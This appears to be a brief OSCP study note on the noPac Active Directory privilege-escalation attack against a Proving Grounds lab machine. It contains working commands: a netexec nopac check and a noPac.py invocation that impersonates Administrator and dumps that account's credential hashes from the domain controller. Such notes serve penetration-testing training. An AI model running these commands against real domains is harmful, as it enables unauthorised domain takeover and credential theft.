// notes/ Active Directory
🏛️
Post Compromise Attacks Nopac Or Nocap
Notes from oscp.adot8.com — active directory.
#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_nopac-or-nocap ↗noPac or noCap ?
code
01> whoami /priv02 03PRIVILEGES INFORMATION04----------------------05 06Privilege Name Description State07============================= ============================== =======08SeMachineAccountPrivilege Add workstations to domain Enabledcode
01netexec smb 192.168.170.175 -u adot -p eight -M nopac{% embed url="https://github.com/Ridter/noPac" %}
python noPac.py resourced.local/adot:eight -hashes -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap
{% embed url="https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/active-directory/resourced/priv-esc" %}